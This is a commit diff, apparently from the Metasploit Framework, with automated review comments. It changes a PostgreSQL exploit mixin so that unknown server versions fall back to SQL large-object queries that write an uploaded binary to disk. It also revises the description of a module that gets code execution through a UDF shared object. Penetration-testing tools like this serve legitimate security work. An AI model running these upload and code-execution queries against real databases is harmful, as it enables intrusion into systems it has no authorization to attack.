Go back to old behavior for unknown versions
May not be correct, but it's what we used to do, so probably better than just raising. Also documents things a bit better. bug/bundler_fix
parent
1eccb24bf8
commit
768d2c5921
@ -325,20 +325,20 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
|
||||
# Writes b64 data from a table field, decoded, to disk.
|
||||
#
|
||||
# This is accomplished with 3 sql queries:
|
||||
# 1. select lo_create
|
||||
# 2. version dependant:
|
||||
# - on 9.x, insert into pg_largeobject
|
||||
# - on older versions, update pg_largeobject
|
||||
# 3. select lo_export to write the file to disk
|
||||
#
|
||||
def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
|
||||
oid = rand(60000) + 1000
|
||||
remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
|
||||
|
||||
ver = postgres_fingerprint
|
||||
case ver[:auth]
|
||||
when /PostgreSQL 8\./
|
||||
# 8.x inserts the largeobject into the table when you do the
|
||||
# lo_create, so we with a value.
|
||||
queries = [
|
||||
"select lo_create(#{oid})",
|
||||
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
|
||||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
when /PostgreSQL 9\./
|
||||
# 9.x does *not* insert the largeobject into the table when you do
|
||||
# the lo_create, so we must insert it ourselves.
|
||||
|
@ -348,10 +348,17 @@ module Exploit::Remote::Postgres
|
|||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
else
|
||||
# Since the technique required for uploading seems to change
|
||||
# between versions, complain that we don't know how to do it for
|
||||
# an unknown version.
|
||||
raise RuntimeError.new("Unknown Postgres version, don't know how to upload files")
|
||||
# 8.x inserts the largeobject into the table when you do the
|
||||
# lo_create, so we with a value.
|
||||
#
|
||||
# 7.x is an unknown, but this behavior was the default before the
|
||||
# addition of support for 9.x above, so try it this way and hope
|
||||
# for the best
|
||||
queries = [
|
||||
"select lo_create(#{oid})",
|
||||
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
|
||||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
end
|
||||
|
||||
queries.each do |q|
|
||||
|
|
|
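Review bot: The rewritten `else` branch in the second hunk now also absorbs a fingerprint that produced no version string — if `postgres_fingerprint` returns a hash without `:auth`, `case nil` falls through to this branch and the 8.x technique is attempted silently, which the new comment ("7.x is an unknown") does not cover; consider recording which path was taken, e.g. `vprint_status("Unrecognized PostgreSQL version #{ver[:auth].inspect}, falling back to the 8.x upload technique")` just before `queries = [`, so a later upload failure can be traced to the version guess. The comment carried into the top of the branch also keeps a garbled sentence: `# lo_create, so we with a value.` should read `# lo_create, so we update it with a value.`. If the `when /PostgreSQL 8\./` branch shown in the first hunk is still present on the new side, its query list is now repeated verbatim here and the two could share a single definition. The enclosing `postgres_write_data_to_disk` continues past the hunk (the `queries.each` loop at its end runs outside it).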
@ -24,16 +24,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'PostgreSQL for Linux Payload Execution',
|
||||
'Description' => %q{
|
||||
This module creates and enables a custom UDF (user defined function) on the
|
||||
target host via the UPDATE pg_largeobject method of binary injection. On
|
||||
default Microsoft Linux installations of PostgreSQL (=< 8.4), the postgres
|
||||
service account may write to the Windows temp directory, and may source
|
||||
UDF Shared Libraries's from there as well.
|
||||
On some default Linux installations of PostgreSQL, the
|
||||
postgres service account may write to the /tmp directory, and
|
||||
may source UDF Shared Libraries's from there as well, allowing
|
||||
execution of arbitrary code.
|
||||
|
||||
PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on are valid targets for this module.
|
||||
|
||||
NOTE: This module will leave a payload executable on the target system when the
|
||||
attack is finished, as well as the UDF SO and the OID.
|
||||
This module compiles a Linux shared object file, uploads it to
|
||||
the target host via the UPDATE pg_largeobject method of binary
|
||||
injection, and creates a UDF (user defined function) from that
|
||||
shared object. Because the payload is run as the shared object's
|
||||
constructor, it does not need to conform to specific Postgres
|
||||
API versions.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
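Review bot: The new description text keeps the possessive typo `UDF Shared Libraries's` on the line `may source UDF Shared Libraries's from there as well, allowing`; it should read `may source UDF shared libraries from there as well, allowing`. The `'Description'` value sits inside the `super(update_info(info, ...))` call whose `def initialize` begins before this hunk.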